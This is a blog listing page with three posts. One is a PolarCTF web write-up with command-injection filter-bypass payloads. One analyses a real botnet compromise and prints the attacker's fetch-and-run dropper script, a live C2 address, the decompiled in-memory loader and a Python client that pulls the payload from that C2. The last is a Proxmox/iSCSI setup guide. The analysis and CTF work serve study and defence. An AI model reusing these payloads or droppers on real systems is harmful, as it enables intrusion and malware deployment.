Homepage
iYoRoy DN42 Network
About
Friends
Language
简体中文
English
Search
1
Centralized Deployment of EasyTier using Docker
1,705 Views
2
Adding KernelSU Support to Android 4.9 Kernel
1,091 Views
3
Enabling EROFS Support for an Android ROM with Kernel 4.9
309 Views
4
Installing 1Panel Using Docker on TrueNAS
300 Views
5
2025 Yangcheng Cup CTF Preliminary WriteUp
296 Views
Android
Ops
NAS
Develop
Network
Projects
DN42
One Man ISP
CTF
Cybersecurity
Login
Search
Search Tags
Network Technology
BGP
Linux
BIRD
DN42
C&C++
Android
Windows
OSPF
Docker
AOSP
MSVC
Services
DNS
STL
Interior Gateway Protocol
Kernel
caf/clo
Web
TrueNAS
Kagura iYoRoy
A total of
28
articles have been written.
A total of
14
comments have been received.
Index
Column
Android
Ops
NAS
Develop
Network
Projects
DN42
One Man ISP
CTF
Cybersecurity
Pages
iYoRoy DN42 Network
About
Friends
Language
简体中文
English
28
articles related to
were found.
PolarCTF 2025 Winter Competition Web Polarflag WriteUp
Opening the webpage, you can see it is a login page: Attempting to scan with dirsearch yields: Target: http://8c9e4bf8-68c2-4c3f-bf12-2b578912c971.game.polarctf.com:8090/ [15:15:01] Starting: [15:15:04] 403 - 319B - /.ht_wsr.txt [15:15:04] 403 - 319B - /.htaccess.bak1 [15:15:04] 403 - 319B - /.htaccess.orig [15:15:04] 403 - 319B - /.htaccess.sample [15:15:04] 403 - 319B - /.htaccess.save [15:15:04] 403 - 319B - /.htaccess_orig [15:15:04] 403 - 319B - /.htaccess_extra [15:15:04] 403 - 319B - /.htaccess_sc [15:15:04] 403 - 319B - /.htaccessBAK [15:15:04] 403 - 319B - /.htaccessOLD [15:15:04] 403 - 319B - /.htaccessOLD2 [15:15:04] 403 - 319B - /.htm [15:15:04] 403 - 319B - /.html [15:15:04] 403 - 319B - /.htpasswd_test [15:15:04] 403 - 319B - /.htpasswds [15:15:04] 403 - 319B - /.httr-oauth [15:15:19] 200 - 448B - /flag.txt [15:15:20] 200 - 3KB - /index.php [15:15:20] 200 - 3KB - /index.php/login/ [15:15:28] 403 - 319B - /server-status/ [15:15:28] 403 - 319B - /server-status Task Completed Discover /flag.txt, access it: <?php $original = "flag{polar_flag_in_here}"; $ascii_codes = [117, 115, 101, 114, 110, 97, 109, 101]; $new = ""; foreach ($ascii_codes as $code) { $new .= chr($code); } function replaceString($original, $new) { $temp = str_replace("flag{", "the_", $original); $temp = str_replace("polar_flag_in_here}", $new . "_is_polar", $temp); return $temp; } $result = replaceString($orginal, $ne1w); echo "flag{polar_flag_in_here}"; ?> Attempting to run it reveals a syntax error. Correct it: ... return $temp; } -$result = replaceString($orginal, $ne1w); +$result = replaceString($original, $new); -echo "flag{polar_flag_in_here}"; +echo $result; Running it yields: the_username_is_polar, hinting that the username is polar. Meanwhile, the challenge attachment provides a dictionary wordlist.txt. Attempt brute-forcing with BurpSuite: Brute-forcing reveals that when the password is 6666, it redirects to /polar.php: Access /polar.php, obtain: <?php error_reporting(0); session_start(); if(isset($_GET['logout'])){ session_destroy(); header('Location: index.php'); exit(); } // Initialize session variable if(!isset($_SESSION['collision_passed'])) { $_SESSION['collision_passed'] = false; } // The one who wants to win has no smile on their face if(isset($_POST['a']) && isset($_POST['b'])) { if($_POST['a'] != $_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) { echo "MD5 Well done \n"; $_SESSION['collision_passed'] = true; } else { echo "MD5 Not good enough\n"; $_SESSION['collision_passed'] = false; } } if(isset($_GET["polar"])){ if($_SESSION['collision_passed']) { if(preg_match('/et|echo|cat|tac|base|sh|tar|more|less|tail|nl|fl|vi|head|env|\||;|\^|\'|\]|"|<|>|`|\/| |\\\\|\*/i',$_GET["polar"])){ echo "gun gun !"; } else { echo "polar polar !"; system($_GET["polar"]); } } else { echo "Go back, this part isn't needed\n"; } } else { show_source(__FILE__); echo '<br><br><a href="?logout=1" style="color: #4CAF50; text-decoration: none; font-weight: bold;">Go home</a>'; } ?> First, bypass the MD5 check by passing a[]=1&b[]=2: POST /polar.php HTTP/1.1 Host: 350eddd0-fd57-4dd0-94d3-c0c8888afd7d.game.polarctf.com:8090 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.95 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 11 a[]=1&b[]=2 The server returns: Set-Cookie: PHPSESSID=443dctaboep4kh53upn3v2pqal; path=/ And prompts MD5 Well done, successfully bypassing. Since I used BurpSuite to send the request, I plan to use a regular browser next, so I write this cookie into the browser. Then directly access /polar.php?polar= to pass commands, no need to bypass MD5 again. Observing the regex filtering rules, many characters are blocked, including a series of symbols. First, try exporting environment variables with export, and discover a Flag: flag{7b93dd56-4f33-4738-b916-464a984093b3}, but submitting it shows it's incorrect. Asking customer service confirms this Flag is wrong. Since spaces are filtered, use $IFS$1 or %09 (Tab) to bypass. Also, because / is blocked, use ${PWD:0:1} (extract the first character of the PWD environment variable, which is /) instead. Construct the request: http://350eddd0-fd57-4dd0-94d3-c0c8888afd7d.game.polarctf.com:8090/polar.php?polar=ls%09${PWD:0:1} Obtain: polar polar !bin dev etc home lib media mnt opt polarflag proc root run sbin srv sys tmp usr var Discover the Flag file: /polarflag. Since fl is filtered, cannot directly call the filename, so use ????????? to match a 9-character file. Commands like cat, tail, more, less that can print content are disabled, but commands like sort can still be used and also print content: http://350eddd0-fd57-4dd0-94d3-c0c8888afd7d.game.polarctf.com:8090/polar.php?polar=sort%09${PWD:0:1}????????? Obtain the Flag: flag{polarctf1314inwebgame}
07/12/2025
62 Views
0 Comments
1 Stars
The Reverse Engineering Journey: Analyzing a Server Compromise via RCE from CVE-2025-66478 and CVE-2025-55182
Background It was Saturday evening, and I was resting when Alibaba Cloud suddenly called, saying the server might have been hacked by intruders. I logged into the Alibaba Cloud console to check: What I had been worrying about finally happened. The recently disclosed CVE-2025-55182 vulnerability is exploitable for RCE (Remote Code Execution). The Umami analytics tool running on my server used a vulnerable version of Next.JS. Earlier in the morning, I had manually updated my Umami, but it seems the official patch had not been released yet. The server alert originated from the umami container, which executed a remote shell script. As a CTFer, it's hard to resist analyzing a sample delivered right to your doorstep, right? Analysis The Script The warning from Alibaba Cloud showed the execution of a shell script: /bin/sh -c wget https://sup001.oss-cn-hongkong.aliyuncs.com/123/python1.sh && chmod 777 python1.sh && ./python1.sh I tried to manually download that python1.sh: export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin mkdir -p /tmp cd /tmp touch /usr/local/bin/writeablex >/dev/null 2>&1 && cd /usr/local/bin/ touch /usr/libexec/writeablex >/dev/null 2>&1 && cd /usr/libexec/ touch /usr/bin/writeablex >/dev/null 2>&1 && cd /usr/bin/ rm -rf /usr/local/bin/writeablex /usr/libexec/writeablex /usr/bin/writeablex export PATH=$PATH:$(pwd) l64="119.45.243.154:8443/?h=119.45.243.154&p=8443&t=tcp&a=l64&stage=true" l32="119.45.243.154:8443/?h=119.45.243.154&p=8443&t=tcp&a=l32&stage=true" a64="119.45.243.154:8443/?h=119.45.243.154&p=8443&t=tcp&a=a64&stage=true" a32="119.45.243.154:8443/?h=119.45.243.154&p=8443&t=tcp&a=a32&stage=true" v="042d0094tcp" rm -rf $v ARCH=$(uname -m) if [ ${ARCH}x = "x86_64x" ]; then (curl -fsSL -m180 $l64 -o $v||wget -T180 -q $l64 -O $v||python -c 'import urllib;urllib.urlretrieve("http://'$l64'", "'$v'")') elif [ ${ARCH}x = "i386x" ]; then (curl -fsSL -m180 $l32 -o $v||wget -T180 -q $l32 -O $v||python -c 'import urllib;urllib.urlretrieve("http://'$l32'", "'$v'")') elif [ ${ARCH}x = "i686x" ]; then (curl -fsSL -m180 $l32 -o $v||wget -T180 -q $l32 -O $v||python -c 'import urllib;urllib.urlretrieve("http://'$l32'", "'$v'")') elif [ ${ARCH}x = "aarch64x" ]; then (curl -fsSL -m180 $a64 -o $v||wget -T180 -q $a64 -O $v||python -c 'import urllib;urllib.urlretrieve("http://'$a64'", "'$v'")') elif [ ${ARCH}x = "armv7lx" ]; then (curl -fsSL -m180 $a32 -o $v||wget -T180 -q $a32 -O $v||python -c 'import urllib;urllib.urlretrieve("http://'$a32'", "'$v'")') fi chmod +x $v (nohup $(pwd)/$v > /dev/null 2>&1 &) || (nohup ./$v > /dev/null 2>&1 &) || (nohup /usr/bin/$v > /dev/null 2>&1 &) || (nohup /usr/libexec/$v > /dev/null 2>&1 &) || (nohup /usr/local/bin/$v > /dev/null 2>&1 &) || (nohup /tmp/$v > /dev/null 2>&1 &) # I found that it downloads the corresponding ELF file based on the CPU architecture. The Loader I attempted to manually download the binary for the amd64 architecture specified in the script above and opened it with IDA Pro: int __fastcall main(int argc, const char **argv, const char **envp) { struct hostent *v3; // rax in_addr_t v4; // eax int v5; // eax int v6; // ebx int v7; // r12d int v8; // edx _BYTE *v9; // rax __int64 v10; // rcx _DWORD *v11; // rdi _BYTE buf[2]; // [rsp+2h] [rbp-1476h] BYREF int optval; // [rsp+4h] [rbp-1474h] BYREF char *argva[2]; // [rsp+8h] [rbp-1470h] BYREF sockaddr addr; // [rsp+1Ch] [rbp-145Ch] BYREF char name[33]; // [rsp+2Fh] [rbp-1449h] BYREF char resolved[1024]; // [rsp+50h] [rbp-1428h] BYREF _BYTE v19[4136]; // [rsp+450h] [rbp-1028h] BYREF if ( !access("/tmp/log_de.log", 0) ) exit(0); qmemcpy(name, "119.45.243.154", sizeof(name)); *(_QWORD *)&addr.sa_family = 4213178370LL; *(_QWORD *)&addr.sa_data[6] = 0LL; v3 = gethostbyname(name); if ( v3 ) v4 = **(_DWORD **)v3->h_addr_list; else v4 = inet_addr(name); *(_DWORD *)&addr.sa_data[2] = v4; v5 = socket(2, 1, 0); v6 = v5; if ( v5 >= 0 ) { optval = 10; setsockopt(v5, 6, 7, &optval, 4u); while ( connect(v6, &addr, 0x10u) == -1 ) sleep(0xAu); send(v6, "l64 ", 6uLL, 0); buf[0] = addr.sa_data[0]; buf[1] = addr.sa_data[1]; send(v6, buf, 2uLL, 0); send(v6, name, 0x20uLL, 0); v7 = syscall(319LL, "a", 0LL); if ( v7 >= 0 ) { while ( 1 ) { v8 = recv(v6, v19, 0x1000uLL, 0); if ( v8 <= 0 ) break; v9 = v19; do *v9++ ^= 0x99u; while ( (int)((_DWORD)v9 - (unsigned int)v19) < v8 ); write(v7, v19, v8); } v10 = 1024LL; v11 = v19; while ( v10 ) { *v11++ = 0; --v10; } close(v6); realpath(*argv, resolved); setenv("CWD", resolved, 1); argva[0] = "[kworker/0:2]"; argva[1] = 0LL; fexecve(v7, argva, _bss_start); } } return 0; } Analysis revealed several key malicious operations: v7 = syscall(319LL, "a", 0LL);: 319 corresponds to the memfd_create system call on Linux x64, used to create an anonymous file in memory. Subsequently, it downloads a Payload from the target server and loads it into this memory region for execution. *v9++ ^= 0x99u;: Decrypts the downloaded Payload by XOR-ing each byte with 0x99, likely to evade firewall detection. argva[0] = "[kworker/0:2]";: Disguises the process as a kernel kworker process. Other operations: Checks for the existence of the log file /tmp/log_de.log to determine if the server has already been compromised. If so, it exits immediately. If connecting to the C2 server fails, it retries every 10 seconds to connect and load the Payload. The C2 server IP 119.45.243.154 is evident from the reversed code, but the port wasn't immediately obvious. Let's analyze the port setting code: *(_QWORD *)&addr.sa_family = 4213178370LL; Here, 4213178370LL (DEC) = 0xFB200002 (HEX). Since it's a QWORD (64-bit value), the actual value is 0x00000000FB200002. Due to little-endian byte order, the bytes stored in memory would be 02 00 20 FB 00 00 00 00. The typical memory layout for sockaddr is: offset 0–1: sa_family (2 bytes) offset 2–15: sa_data (14 bytes) Thus, the assignment above does the following: offset 0: Low byte of sa_family = 0x02 offset 1: High byte of sa_family = 0x00 offset 2: sa_data[0] = 0x20 offset 3: sa_data[1] = 0xFB offset 4..7: sa_data[2..5] = 0x00 0x00 0x00 0x00 Here, sa_data[0..1] represents the port, and sa_data[2..5] represents the IP address. Since network byte order is big-endian, the actual port is 0x20FB, which is 8443. The IP address assignment is found later: v3 = gethostbyname(name); if ( v3 ) v4 = **(_DWORD **)v3->h_addr_list; else v4 = inet_addr(name); *(_DWORD *)&addr.sa_data[2] = v4; I wrote a Python script to connect to the server based on the loader's logic and attempt to download the Payload into an ELF file: import socket import time import os C2_HOST = "119.45.243.154" C2_PORT = 8443 OUTPUT_FILE = "payload.elf" def xor_decode(data): return bytes([b ^ 0x99 for b in data]) def main(): # Delete old file if os.path.exists(OUTPUT_FILE): os.remove(OUTPUT_FILE) while True: try: print(f"[+] Connecting to C2 {C2_HOST}:{C2_PORT} ...") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((C2_HOST, C2_PORT)) print("[+] Connected.") # Handshake s.send(b"l64 ") s.send(b"\x20\xfb") # fake port s.send(b"119.45.243.154".ljust(32, b"\x00")) print("[+] Handshake sent.") print(f"[+] Writing decrypted ELF data to {OUTPUT_FILE}\n") with open(OUTPUT_FILE, "ab") as f: while True: data = s.recv(4096) if not data: print("[-] C2 closed connection.") break decrypted = xor_decode(data) f.write(decrypted) print(f"[+] Received {len(data)} bytes, written to file.") print("[*] Reconnecting in 10 seconds...\n") time.sleep(10) except Exception as e: print(f"[-] Error: {e}") print("[*] Reconnecting in 10 seconds...\n") time.sleep(10) if __name__ == "__main__": main() Running it yielded an ELF file, payload.elf. Payload.elf First, I uploaded it to Weibu Cloud Sandbox for detection, which confirmed it was a Trojan: However, the sandbox didn't detect highly dangerous behaviors. I consulted a senior in reverse engineering, who analyzed the sample and determined it was written in Go. I used GoReSym to export the symbol table and loaded it into IDA Pro: \GoReSym.exe payload.elf > symbols.json I had an AI write an IDA Pro script to import the symbol table: import json import idc import idaapi import idautils # ⚠️ Modify this: Path to your generated symbols.json file json_path = r"D:\\Desktop\\symbols.json" def restore_symbols(): print("[-] Loading symbols from JSON...") try: with open(json_path, 'r', encoding='utf-8') as f: data = json.load(f) except Exception as e: print(f"[!] Error opening file: {e}") return # 1. Restore User Functions count = 0 for func in data.get('UserFunctions', []): start_addr = func['Start'] full_name = func['FullName'] # Clean up characters IDA doesn't like safe_name = full_name.replace("(", "_").replace(")", "_").replace("*", "ptr_").replace("/", "_") # Attempt to rename if idc.set_name(start_addr, safe_name, idc.SN_NOWARN | idc.SN_NOCHECK) == 1: # Optionally, if renaming succeeds, try to re-analyze as code idc.create_insn(start_addr) idc.add_func(start_addr) count += 1 print(f"[+] Successfully renamed {count} functions.") if __name__ == "__main__": restore_symbols() In IDA, I used File -> Script file to run the script and import the symbol table. Simultaneously, I provided the symbol table to an AI for analysis, which identified functions related to OSS bucket operations: (*Config).GetAccessKeyID / GetAccessKeySecret / GetSecurityToken -> Steals or uses cloud credentials. Bucket.PutObjectFromFile -> Uploads files (very likely exfiltrating data from your server to the attacker's OSS Bucket). Bucket.DoPutObject -> Executes the upload operation. (*Config).LimitUploadSpeed / LimitDownloadSpeed -> Limits bandwidth usage to avoid detection of abnormal network activity. Obfuscated Package Name Real Package / Functional Guess Evidence (Artifacts) Behavior Description ojQuzc_T Aliyun OSS SDK PutObjectFromFile, GetAccessKeySecret Connects to Aliyun OSS, uploads/downloads files, steals credentials. l2FdnE6 os/exec (Command Execution) (*Ps1Jpr8w8).Start, StdinPipe, Output Executes system commands. It calls Linux shell commands. qzjJr5PCHfoj os / Filesystem Operations Readdir, Chown, Truncate, SyscallConn Traverses directories, modifies file permissions, reads/writes files. PqV1YDIP godbus/dbus (D-Bus) (*Conn).BusObject, (*Conn).Eavesdrop Connects to Linux D-Bus. Possibly for privilege escalation, monitoring system events, or interacting with systemd. c376cVel0vv math/rand NormFloat64, Shuffle, Int63 Generates random numbers. Often used for generating communication keys or randomness in mining algorithms. r_zJbsaQ net (Low-level Networking) DialContext, Listen, Accept, SetKeepAlive Establishes TCP/UDP connections, possibly for C2 communication or as a backdoor listening on a port. J9ItGl7U net/http2 http2ErrCode, WriteHeaders, WriteData Uses HTTP/2 protocol for communication (likely to hide C2 traffic). Otkxde ECC Cryptography Library ScalarMult, Double, SetGenerator Elliptic curve encryption. Possibly for encrypting C2 communication or as an encryption module for ransomware. We can infer some possible program logic: Persistence & Control (D-Bus & Net): It attempts to connect via D-Bus using the PqV1YDIP package, which is less common in server malware. It might be trying to hijack system services or monitor administrator activity. It listens on ports or establishes reverse connections via r_zJbsaQ. Data Exfiltration (Aliyun OSS): It doesn't send data back to a typical C2 server IP but uses Aliyun OSS as a "transit point." This is a clever tactic because traffic to Aliyun is often considered whitelisted by firewalls and harder to detect. Command Execution (os/exec): It has full shell execution capabilities (l2FdnE6), allowing it to execute arbitrary commands, download scripts, and modify file permissions. Possible Ransomware or Cryptominer Features: Numerous mathematical operation libraries (Otkxde, HfBi9x4DOLl, etc., contain many Mul, Add, Square, Invert) suggest it is computationally intensive. If it's ransomware: These math libraries are used to generate keys for encrypting files. If it's a cryptocurrency miner: These libraries are used to calculate hashes. Combined with its use of Shuffle and NormFloat64 from math/rand, this aligns with features of some mining algorithms (like RandomX). Further analysis led to a function named UXTgUQ_stlzy_RraJUM: I had an AI analyze it and the conclusion was: This is a very typical C2 (Command & Control) instruction dispatcher function written in Golang. Combined with the context of the "Linux loader" mentioned earlier, this function belongs to the core Trojan (Bot) that was downloaded and executed by that loader. 1. Overview and Location Function: Instruction Dispatcher (Command Dispatcher). This is part of the main loop logic of the Trojan, responsible for receiving command strings from the C2 server, parsing them, and executing corresponding malicious functions. Security Mechanism: The function begins with an authentication check if ( v18 == a2 && (unsigned __int8)sub_4035C0() ). If validation fails, it returns "401 Not Auth", indicating that this Trojan has some anti-scanning or session authentication mechanisms. 2. Detailed Reverse Engineering of the Instruction Set The code uses switch ( a4 ) to determine the length of the command string and then checks its specific content. There are numerous hardcoded strings and Hex values here: Case 1 (Single-character commands - Basic Control) These are likely remnants of an early version or shorthand commands designed to reduce traffic: I: Calls os_rename. Function: Renames a file. E: Calls os_removeAll. Function: Deletes files/cleans traces. J: Returns "0" or unknown. Possibly used for heartbeat detection or status queries. Z: Returns "mysql_close\t1". Function: Database-related. It's inferred that this Trojan includes a MySQL brute-force or connection module, and this command closes the connection. H: Possibly gets host information (Host Info). Other single letters (A-Y): Call different sub-functions (like sub_7CAF40), typically corresponding to: enabling proxies, executing shell commands, obtaining system load, etc. Case 4 (Four-character commands) Hex: 1414092869 -> Little Endian: 0x54495845 -> "EXIT" Function: Terminates the Trojan process. Case 8 (Eight-character commands - Core Functions) This is the most critical part, exposing the Trojan's core capabilities: Download Hex: 0x64616F6C6E776F44LL -> "Download" Function: Downloader functionality. Downloads files from a specified URL. Code Logic: If a11 (callback function or interface) exists, it calls it to process the download result. LocalRun Hex: 0x6E75526C61636F4CLL -> "LocalRun" Function: Local execution. Likely executes a local shell script or binary file. Case 9 (Nine-character commands - Advanced Attacks) InjectRun Hex: 0x75527463656A6E49LL + 'n' -> "InjectRun" Function: Memory injection execution. This is an advanced feature, used in conjunction with memfd_create seen earlier. It typically refers to injecting a payload into another process or running it directly in memory without touching the disk. PluginRun Hex: 0x75526E6967756C50LL + 'n' -> "PluginRun" Function: Plugin execution. This indicates that the Trojan is modular and can dynamically load .so or Go plugin modules to extend functionality (such as cryptocurrency mining, DDoS attacks, port scanning, etc.). 3. Response Construction Logic After the switch block, there is a complex string concatenation logic: *(_WORD *)v71 = 15917 -> ASCII for | and }? Or specific delimiters. *(_BYTE *)(v80 + v79 + 2) = 45 -> ASCII for -. Conclusion: The Trojan wraps the command execution result (like "OK", "Error", or specific data) with specific delimiters (e.g., |<result>-) before sending it back to the C2. 4. Summary and Profile Combined with the previous code (the Loader), we can create a complete profile for this Trojan: Family Speculation: This naming style (InjectRun / PluginRun / LocalRun), combined with being written in Go and supporting modular plugins, strongly resembles the Spark botnet or a variant (like a modified version of the Sliver C2, but it's more akin to a custom-built blackhat bot). It could also be a variant of the Sysrv-hello mining worm (which often mixes Go and exploits). Attack Chain: Loader: The earlier C code, responsible for environment detection, persistence, and downloading the Bot in memory. Bot (this code): This Go program, resident in memory. Modules: Dynamically delivers mining modules (like XMRig) or DDoS attack modules via PluginRun. Lateral Movement: The mysql_close hint suggests it has password-scanning capabilities and infects other machines on the internal network via InjectRun. Conclusion Honestly, I felt there wasn't much more meaningful analysis to be done. The logic essentially confirms it's a typical Botnet. The discovered IP has a 99% probability of being a compromised zombie machine, so investigating it seems pointless. The main takeaway is to summarize lessons learned on preventing such incidents. For small-scale personal websites like mine, when a CVE is disclosed, it's best to immediately disable all related services. Wait for a confirmed patched version to be released, then update and re-enable the services. Sample Download: Payload.zip Note: This sample is unprocessed. Do not run it directly without proper security measures! Password: 20251206
06/12/2025
131 Views
1 Comments
4 Stars
An Experience of Manually Installing Proxmox VE, Configuring Multipath iSCSI, and NAT Forwarding
The reason was that I rented a physical server, but the IDC did not provide Proxmox VE or Debian system images, only Ubuntu, CentOS, and Windows series. Additionally, the data disk was provided via multipath iSCSI. I wanted to use PVE for isolating different usage scenarios, so I attempted to reinstall the system and migrate the aforementioned configurations. Backup Configuration First, perform a general check of the system, which reveals: The system has two Network Interfaces: enp24s0f0 is connected to a public IP address for external access; enp24s0f1 is connected to the private network address 192.168.128.153. The data disk is mapped to /dev/mapper/mpatha. Under /etc/iscsi, there are configurations for two iSCSI Nodes: 192.168.128.250:3260 and 192.168.128.252:3260, both corresponding to the same target iqn.2024-12.com.ceph:iscsi. It can be inferred that the data disk is mounted by configuring two iSCSI Nodes and then merging them into a single device using multipath. Check the system's network configuration: network: version: 2 renderer: networkd ethernets: enp24s0f0: addresses: [211.154.[REDACTED]/24] routes: - to: default via: [REDACTED] match: macaddress: ac:1f:6b:0b:e2:d4 set-name: enp24s0f0 nameservers: addresses: - 114.114.114.114 - 8.8.8.8 enp24s0f1: addresses: - 192.168.128.153/17 match: macaddress: ac:1f:6b:0b:e2:d5 set-name: enp24s0f1 It's found to be very simple static routing. The internal network interface doesn't even have a default route; just binding the IP is sufficient. Then, save the iSCSI configuration files from /etc/iscsi, which include account and password information. Reinstall Debian Used the bin456789/reinstall script for this reinstallation. Download the script: curl -O https://cnb.cool/bin456789/reinstall/-/git/raw/main/reinstall.sh || wget -O ${_##*/} $_ Reinstall as Debian 13 (Trixie): bash reinstall.sh debian 13 Then, enter the password you want to set as prompted. If all goes well, wait about 10 minutes, and it will automatically complete and reinstall into a clean Debian 13. You can connect via SSH during the process using the set password to check the installation progress. After reinstalling, perform a source change and apt upgrade as usual to get a clean Debian 13. For changing sources, directly refer to the USTC Mirror Site tutorial. Install Proxmox VE This step mainly refers to the Proxmox official tutorial. Note: The Debian installed by the above script sets the hostname to localhost. If you want to change it, please modify it before configuring the Hostname and change the hostname in hosts to your modified hostname, not localhost. Configure Hostname Proxmox VE requires the current hostname to be resolvable to a non-loopback IP address: The hostname of your machine must be resolvable to an IP address. This IP address must not be a loopback one like 127.0.0.1 but one that you and other hosts can connect to. For example, my server IP is 211.154.[CENSORED], I need to add the following record in /etc/hosts: 127.0.0.1 localhost +211.154.[CENSORED] localhost ::1 localhost ip6-localhost ip6-loopback ff02::1 ip6-allnodes ff02::2 ip6-allrouters After saving, use hostname --ip-address to check if it outputs the set non-loopback address: ::1 127.0.0.1 211.154.[CENSORED]. Add Proxmox VE Software Repository Debian 13 uses the Deb822 format (though you can use sources.list if you want), so just refer to the USTC Proxmox Mirror Site: cat > /etc/apt/sources.list.d/pve-no-subscription.sources <<EOF Types: deb URIs: https://mirrors.ustc.edu.cn/proxmox/debian/pve Suites: trixie Components: pve-no-subscription Signed-By: /usr/share/keyrings/proxmox-archive-keyring.gpg EOF Here, a keyring needs to be migrated but I couldn't find one after searching online, so I chose to pull a copy from an existing Proxmox VE server. It's available here: proxmox-keyrings.zip Extract the public key file and place it in /usr/share/keyrings/, then run: apt update apt upgrade -y This will sync the Proxmox VE software repository. Install Proxmox VE Kernel Use the following command to install the PVE kernel and reboot to apply the new kernel: apt install proxmox-default-kernel reboot Afterwards, uname -r should show a kernel version ending with pve, like 6.17.2-2-pve, indicating the new kernel is successfully applied. Install Proxmox VE Related Packages Use apt to install the corresponding packages: apt install proxmox-ve postfix open-iscsi chrony During configuration, you will need to set up the postfix mail server. Official explanation: If you have a mail server in your network, you should configure postfix as a satellite system. Your existing mail server will then be the relay host which will route the emails sent by Proxmox VE to their final recipient. If you don't know what to enter here, choose local only and leave the system name as is. After this, you should be able to access the Web console at https://<your server address>:8006. The account is root, and the password is your root password, i.e., the password configured during the Debian reinstallation. Remove Old Debian Kernel and os-prober Use the following commands: apt remove linux-image-amd64 'linux-image-6.1*' update-grub apt remove os-prober to remove the old Debian kernel, update grub, and remove os-prober. Removing os-prober is not mandatory, but it is recommended by the official guide because it might mistakenly identify VM boot files as multi-boot files, adding incorrect entries to the boot list. At this point, the installation of Proxmox VE is complete and ready for normal use! Configuring Internal Network Interface Because the iSCSI network interface and the public network interface are different, and the reinstallation lost this configuration, the internal network interface needs to be manually configured. Open the Proxmox VE Web interface, go to Datacenter - localhost (hostname) - Network, edit the internal network interface (e.g., ens6f1 here), enter the backed-up IPv4 in CIDR format: 192.168.128.153/17, and check Autostart, then save. Then use the command to set the interface state to UP: ip link set ens6f1 up Now you should be able to ping the internal iSCSI server's IP. Configure Data Disk iSCSI In the previous step, we should have installed the open-iscsi package required for iscsiadm. We just need to reset the nodes according to the backed-up configuration. First, discover the iSCSI storage: iscsiadm -m discovery -t st -p 192.168.128.250:3260 This should yield the two original LUN Targets: 192.168.128.250:3260,1 iqn.2024-12.com.ceph:iscsi 192.168.128.252:3260,2 iqn.2024-12.com.ceph:iscsi Transfer the backed-up configuration files to the server, overwriting the existing configuration in /etc/iscsi. Also, in my backed-up config, I found the authentication configuration: # /etc/iscsi/nodes/iqn.2024-12.com.ceph:iscsi/192.168.128.250,3260,1/default # BEGIN RECORD 2.1.5 node.name = iqn.2024-12.com.ceph:iscsi ... # Some unimportant configurations omitted node.session.auth.authmethod = CHAP node.session.auth.username = [CENSORED] node.session.auth.password = [CENSORED] node.session.auth.chap_algs = MD5 ... # Some unimportant configurations omitted # /etc/iscsi/nodes/iqn.2024-12.com.ceph:iscsi/192.168.128.252,3260,2/default # BEGIN RECORD 2.1.5 node.name = iqn.2024-12.com.ceph:iscsi ... # Some unimportant configurations omitted node.session.auth.authmethod = CHAP node.session.auth.username = [CENSORED] node.session.auth.password = [CENSORED] node.session.auth.chap_algs = MD5 ... # Some unimportant configurations omitted Write these configurations to the new system using: iscsiadm -m node -T iqn.2024-12.com.ceph:iscsi -p 192.168.128.250:3260 -o update -n node.session.auth.authmethod -v CHAP iscsiadm -m node -T iqn.2024-12.com.ceph:iscsi -p 192.168.128.250:3260 -o update -n node.session.auth.username -v [CENSORED] iscsiadm -m node -T iqn.2024-12.com.ceph:iscsi -p 192.168.128.250:3260 -o update -n node.session.auth.password -v [CENSORED] iscsiadm -m node -T iqn.2024-12.com.ceph:iscsi -p 192.168.128.250:3260 -o update -n node.session.auth.chap_algs -v MD5 iscsiadm -m node -T iqn.2024-12.com.ceph:iscsi -p 192.168.128.252:3260 -o update -n node.session.auth.authmethod -v CHAP iscsiadm -m node -T iqn.2024-12.com.ceph:iscsi -p 192.168.128.252:3260 -o update -n node.session.auth.username -v [CENSORED] iscsiadm -m node -T iqn.2024-12.com.ceph:iscsi -p 192.168.128.252:3260 -o update -n node.session.auth.password -v [CENSORED] iscsiadm -m node -T iqn.2024-12.com.ceph:iscsi -p 192.168.128.250:3260 -o update -n node.session.auth.chap_algs -v MD5 (I don't know why the auth info needs to be written separately, but testing shows it won't log in without rewriting it.) Then, use: iscsiadm -m node -T iqn.2024-12.com.ceph:iscsi -p 192.168.128.250:3260 --login iscsiadm -m node -T iqn.2024-12.com.ceph:iscsi -p 192.168.128.252:3260 --login to log into the Targets. Then use: iscsiadm -m node -T iqn.2024-12.com.ceph:iscsi -p 192.168.128.250:3260 -o update -n node.startup -v automatic iscsiadm -m node -T iqn.2024-12.com.ceph:iscsi -p 192.168.128.252:3260 -o update -n node.startup -v automatic to enable automatic mounting on boot. At this point, checking disks with tools like lsblk should reveal two additional hard drives; in my case, sdb and sdc appeared. Configure Multipath To identify if it's a multipath device, I tried: /usr/lib/udev/scsi_id --whitelisted --device=/dev/sdb /usr/lib/udev/scsi_id --whitelisted --device=/dev/sdc Checking the scsi_id of the two disk devices revealed they were identical, confirming they are the same disk using multi-path for load balancing and failover. Install multipath-tools using apt: apt install multipath-tools Then, create /etc/multipath.conf and add: defaults { user_friendly_names yes find_multipaths yes } Configure multipathd to start on boot: systemctl start multipathd systemctl enable multipathd Then, use the following command to scan and automatically configure the multipath device: multipath -ll It should output: mpatha(360014056229953ef442476e85501bfd7)dm-0LIO-ORG,TCMU device size=500G features='1 queue_if_no_path' hwhandler='1 alua'wp=rw |-+- policy='service-time 0' prio=50 status=active | `- 14:0:0:152 sdb 8:16 active ready running `-+- policy='service-time 0' prio=50 status=active `- 14:0:0:152 sdc 8:16 active ready running This shows the two disks have been recognized as a single multipath device. Now, you can find the multipath disk under /dev/mapper/: root@localhost:/dev/mapper# ls control mpatha mpatha is the multipath aggregated disk. If it's not scanned, try using: rescan-scsi-bus.sh to rescan the SCSI bus and try again. If the command is not found, install it via apt install sg3-utils. If all else fails, just reboot. Configure Proxmox VE to Use the Data Disk Because we used multipath, we cannot directly add an iSCSI type storage. Use the following commands to create the PV and VG: pvcreate /dev/mapper/mpatha vgcreate <vg name> 